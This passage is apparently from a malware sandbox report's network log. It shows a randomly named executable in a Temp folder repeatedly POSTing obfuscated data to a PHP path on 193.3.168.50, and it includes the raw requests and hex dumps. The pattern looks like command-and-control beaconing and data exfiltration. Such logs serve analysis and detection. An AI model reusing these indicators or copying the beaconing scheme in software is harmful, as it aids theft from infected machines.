User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:30.721587896 CET | 1060 | OUT | Data Raw: 5a 5e 5a 5f 5c 5d 5f 55 5a 58 51 52 55 51 5a 5f 50 55 5d 52 59 52 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: Z^Z_\]_UZXQRUQZ_PU]RYRWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,0-X< ;<27:7. 7[%,,S#1=['<@! 4)=#G $],=
Dec 5, 2024 10:54:31.612174034 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:31.845249891 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49881 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:32.089801073 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:32.440354109 CET | 1060 | OUT | Data Raw: 5a 5d 5f 5c 59 5c 5a 52 5a 58 51 52 55 56 5a 5b 50 55 5d 5c 59 5f 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: Z]_\Y\ZRZXQRUVZ[PU]\Y_WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\./=Y<8\ %!/<"!),3+\'/8V#!%_'-0"$W*#G $],!
Dec 5, 2024 10:54:33.327554941 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49885 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:33.389946938 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1936
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:33.737289906 CET | 1936 | OUT | Data Raw: 5f 5a 5a 59 59 5d 5f 55 5a 58 51 52 55 50 5a 59 50 50 5d 5d 59 5a 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _ZZYY]_UZXQRUPZYPP]]YZWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.-#%X?9]#)8?- 7.0?%,!")0>A"0$V)-#G $],
Dec 5, 2024 10:54:34.626430988 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:34.861550093 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 09 11 25 5b 25 38 2c 1c 26 3f 2c 08 3c 33 3c 5b 2d 1d 06 06 33 3e 35 42 27 3a 3b 11 29 2a 2c 04 22 2e 36 5d 2b 5f 30 0b 3f 09 2f 0f 3d 28 20 58 00 1a 26 14 34 0b 2c 5b 3a 3a 20 1e 25 13 31 04 33 04 39 5b 29 29 2f 53 3e 1d 34 57 26 3e 07 0e 2a 0a 26 0a 2d 37 36 06 39 10 3d 05 25 3f 2a 52 0e 17 21 51 3d 07 24 5e 22 31 3e 0f 3e 31 30 04 3c 2f 3b 1f 26 28 29 08 20 00 29 57 30 30 35 53 30 21 3d 0e 30 28 38 00 31 2f 3c 5b 29 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98%[%8,&?,<3<[-3>5B':;)*,".6]+_0?/=( X&4,[:: %139[))/S>4W&>*&-769=%?*R!Q=$^"1>>10</;&() )W005S0!=0(81/<[) _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49887 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:33.684422970 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:34.034198046 CET | 1060 | OUT | Data Raw: 5f 51 5f 53 5c 5d 5a 50 5a 58 51 52 55 51 5a 59 50 50 5d 5b 59 5e 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _Q_S\]ZPZXQRUQZYPP][Y^WG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-- <* Y759/<2 )8:?]0/<7=_'-;!3;>=#G $],=
Dec 5, 2024 10:54:34.934099913 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:35.169424057 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
60          192.168.2.4  49890        193.3.168.50    80                7244  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 5, 2024 10:54:35.417795897 CET  417                OUT        POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
Dec 5, 2024 10:54:35.810736895 CET  1060               OUT        Data Raw: 5a 5c 5f 59 5c 5c 5a 50 5a 58 51 52 55 5f 5a 52 50 55 5d 53 59 59 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
  Data Ascii: Z\_Y\\ZPZXQRU_ZRPU]SYYWF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Z/ "+97.;<49:3<72%'>,A5'*#G $],
Dec 5, 2024 10:54:36.661237955 CET  25                 IN         HTTP/1.1 100 Continue
Dec 5, 2024 10:54:36.893187046 CET  200                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:54:36 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
61          192.168.2.4  49895        193.3.168.50    80                7244  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 5, 2024 10:54:37.136306047 CET  441                OUT        POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1056
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:54:37.487129927 CET  1056               OUT        Data Raw: 5a 59 5a 5b 59 59 5f 55 5a 58 51 52 55 57 5a 5d 50 57 5d 5f 59 5a 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
  Data Ascii: ZYZ[YY_UZXQRUWZ]PW]_YZWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/ .=)0\ 6/=[ *(S.3%</#1)$>8"=-#G $],=
Dec 5, 2024 10:54:38.377856970 CET  25                 IN         HTTP/1.1 100 Continue
Dec 5, 2024 10:54:38.613437891 CET  200                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:54:38 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
62          192.168.2.4  49901        193.3.168.50    80                7244  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 5, 2024 10:54:38.854660034 CET  441                OUT        POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1056
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:54:39.206872940 CET  1056               OUT        Data Raw: 5f 58 5f 5d 5c 5e 5a 5f 5a 58 51 52 55 57 5a 58 50 54 5d 5b 59 5c 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
  Data Ascii: _X_]\^Z_ZXQRUWZXPT][Y\WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;+9 %>[.<&49+-#<%,072'./!0#*#G $],)


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
63          192.168.2.4  49906        193.3.168.50    80                7244  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 5, 2024 10:54:39.998816967 CET  441                OUT        POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1936
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:54:40.346879959 CET  1936               OUT        Data Raw: 5f 5b 5f 5e 59 59 5a 54 5a 58 51 52 55 5e 5a 5b 50 51 5d 59 59 5e 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
  Data Ascii: _[_^YYZTZXQRU^Z[PQ]YY^WG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\./+]4"^;/=Y7?.#3]3<720>?##$W*#G $],
Dec 5, 2024 10:54:41.236069918 CET  25                 IN         HTTP/1.1 100 Continue
Dec 5, 2024 10:54:41.469062090 CET  349                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:54:41 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 39 38 0d 0a 09 11 26 02 27 2b 24 1e 24 3c 01 52 3c 33 30 59 3a 0d 27 5e 33 07 22 1a 25 39 23 1c 29 29 20 03 35 03 2a 1e 3c 39 0e 0f 2b 27 3c 53 2a 38 20 58 00 1a 25 07 21 21 2c 5a 2e 5f 34 13 25 2e 2a 18 27 2e 25 19 3e 3a 28 0f 3e 1d 3b 0c 32 3d 21 0b 2a 0d 00 0c 2c 27 36 06 2e 10 26 5d 31 2f 2a 52 0e 17 21 57 29 00 28 5b 20 32 35 56 3d 31 27 5f 3c 3c 33 11 33 28 26 16 20 2d 3e 0d 24 0e 2a 0b 33 0c 3e 1d 33 01 2b 5b 32 3f 01 02 2a 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 98&'+$$<R<30Y:'^3"%9#)) 5*<9+'<S*8 X%!!,Z._4%.*'.%>:(>;2=!*,'6.&]1/*R!W)([ 25V=1'_<<33(& ->$*3>3+[2?*) _. W1WT0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
64          192.168.2.4  49907        193.3.168.50    80                7244  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 5, 2024 10:54:40.122859955 CET  441                OUT        POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:54:40.476926088 CET  1060               OUT        Data Raw: 5f 51 5f 5b 59 5b 5f 50 5a 58 51 52 55 55 5a 5f 50 56 5d 5a 59 59 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
  Data Ascii: _Q_[Y[_PZXQRUUZ_PV]ZYYWH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Y,Y?_8X7&/4*#93+]%/ R4'"7)-#G $],-
Dec 5, 2024 10:54:41.356594086 CET  25                 IN         HTTP/1.1 100 Continue
Dec 5, 2024 10:54:41.588990927 CET  200                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:54:41 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
65          192.168.2.4  49909        193.3.168.50    80                7244  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 5, 2024 10:54:41.829008102 CET  417                OUT        POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
Dec 5, 2024 10:54:42.174653053 CET  1060               OUT        Data Raw: 5f 5c 5f 5b 59 59 5a 5e 5a 58 51 52 55 51 5a 59 50 5f 5d 5b 59 58 57 45 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
  Data Ascii: _\_[YYZ^ZXQRUQZYP_][YXWE^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.X,!? ]4>^.?>!)#.#$#4!=X'!$==#G $],=
Dec 5, 2024 10:54:43.067507982 CET  25                 IN         HTTP/1.1 100 Continue
Dec 5, 2024 10:54:43.301377058 CET  200                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:54:42 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
66          192.168.2.4  49915        193.3.168.50    80                7244  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 5, 2024 10:54:43.545988083 CET  441                OUT        POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:54:43.929065943 CET  1060               OUT        Data Raw: 5f 58 5f 52 59 5f 5f 52 5a 58 51 52 55 5e 5a 52 50 5f 5d 5a 59 5a 57 45 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
  Data Ascii: _X_RY__RZXQRU^ZRP_]ZYZWE^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\--0<:; 6>Z,<X#*4, '$, #-_3"U)=#G $],
Dec 5, 2024 10:54:44.791619062 CET  25                 IN         HTTP/1.1 100 Continue
Dec 5, 2024 10:54:45.051865101 CET  200                IN         HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:54:44 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
67          192.168.2.4  49921        193.3.168.50    80                7244  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 5, 2024 10:54:45.293869019 CET  441                OUT        POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:54:45.643388033 CET  1060               OUT        Data Raw: 5f 5f 5a 59 59 5b 5f 52 5a 58 51 52 55 56 5a 59 50 55 5d 5a 59 53 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
  Data Ascii: __ZYY[_RZXQRUVZYPU]ZYSWG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[-0)X++#>[/<=79#, #3< T!2Z38E"$)#G $],!
Dec 5, 2024 10:54:46.531136036 CET  25                 IN         HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49926 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:46.743530989 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1936
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:54:47.098803997 CET | 1936 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:54:47.836030960 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:48.068979979 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: (hex dump of chunked response body omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49928 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:47.428898096 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:54:47.784110069 CET | 1060 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:54:48.669554949 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:48.905261040 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:48 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49934 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:49.155143023 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
